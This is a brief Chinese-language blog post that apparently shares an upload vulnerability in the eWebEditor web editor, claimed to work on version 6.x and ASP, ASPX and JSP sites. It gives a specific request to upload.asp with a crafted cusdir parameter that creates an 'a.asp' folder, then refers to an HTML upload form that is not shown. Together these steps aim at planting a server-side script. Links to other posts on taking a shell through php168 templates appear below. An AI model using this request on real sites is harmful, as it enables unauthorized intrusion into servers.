ewebeditor 上传漏洞鸡肋0day
还在用ewebeditor的收手吧,这个家伙漏洞百出,就这么点程序怎么老写不好呢。
对6.X的也管用,对ASP。aspx。JSP。均管用。
利用方法:
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。
上一篇: php168新版后台模板拿shell
下一篇: 网吧免费上网的两个方法
目前这篇文章有5条评论(Rss)